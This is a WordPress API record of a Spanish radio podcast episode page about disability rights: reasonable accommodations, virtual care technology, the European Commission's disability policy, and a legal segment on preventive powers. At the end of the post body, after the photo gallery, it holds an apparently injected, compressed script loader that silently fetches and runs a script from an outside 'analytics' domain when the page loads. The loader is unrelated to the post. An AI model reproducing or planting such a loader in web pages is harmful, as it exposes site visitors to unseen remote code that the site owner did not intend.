{"id":5962,"date":"2025-04-17T21:10:22","date_gmt":"2025-04-17T21:10:22","guid":{"rendered":"https:\/\/radiojabato.es\/?p=5962"},"modified":"2026-04-20T15:07:15","modified_gmt":"2026-04-20T15:07:15","slug":"sin-palos-en-las-ruedas-ajustes-razonables-asistencia-virtual-comision-europea-cosas-curiosas-y-seccion-juridica","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=5962","title":{"rendered":"SIN PALOS EN LAS RUEDAS: \u00abAjustes Razonables, Asistencia Virtual, Comisi\u00f3n Europea, Cosas Curiosas y Secci\u00f3n Jur\u00eddica\u00bb."},"content":{"rendered":"\n<iframe src=\"https:\/\/www.ivoox.com\/player_ej_145209073_6_1.html?c1=c03944\" width=\"100%\" height=\"200\" frameborder=\"0\" allowfullscreen=\"\" scrolling=\"no\" loading=\"lazy\"><\/iframe>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"SIN PALOS EN LAS RUEDAS: &quot;Ajustes Razonables, Asistencia Virtual, Comisi\u00f3n Europea y m\u00e1s...&quot;\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/6wSXDHNPuZc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Hablamos con Elena D\u00edaz Carnerero de un derecho espec\u00edfico de las personas con discapacidad, \u00abAjustes Razonables\u00bb que permiten modificaciones y adaptaciones para la participaci\u00f3n de las personas con discapacidad de participar en igualdad de condiciones en todos los aspectos de la vida y desde M\u00e1laga con Francisco Cautes, Concejal de Derechos Sociales, Diversidad, Igualdad y Accesibilidad del Ayuntamiento de M\u00e1laga.<br>De Tecnolog\u00eda para la Asistencia Virtual con Ana Isabel S\u00e1nchez, Jefa de Emprendimiento y de Fondos Europeos de la Diputaci\u00f3n de Zamora y Aurora Otero de Home Doctor.<br>Con Mar\u00eda Canal Fontcuberta de la Comisi\u00f3n Europea y su compromiso con las personas con discapacidad con m\u00e1s de 100 millones de personas en Europa con alg\u00fan tipo de discapacidad.<br>Finalizamos con Cosas Curiosas que Pasan con Miriam Fern\u00e1ndez y La Secci\u00f3n Jur\u00eddica de Christian y los \u00abPoderes Preventivos\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"5964\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Elena-2-1024x768.jpg\" alt=\"\" class=\"wp-image-5964\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Elena-2-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Elena-2-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Elena-2-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Elena-2.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"5963\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Maria-2-1024x768.jpg\" alt=\"\" class=\"wp-image-5963\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Maria-2-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Maria-2-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Maria-2-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Maria-2.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"5965\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Miriam-2-1024x768.jpg\" alt=\"\" class=\"wp-image-5965\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Miriam-2-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Miriam-2-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Miriam-2-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/04\/Miriam-2.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Hablamos con Elena D\u00edaz Carnerero de un derecho espec\u00edfico de las personas con discapacidad, \u00abAjustes Razonables\u00bb que permiten modificaciones y adaptaciones para la participaci\u00f3n de las personas con discapacidad de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1625],"tags":[],"class_list":["post-5962","post","type-post","status-publish","format-standard","hentry","category-sin-palos-en-las-ruedas"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/5962","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5962"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/5962\/revisions"}],"predecessor-version":[{"id":14314,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/5962\/revisions\/14314"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5962"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5962"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5962"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}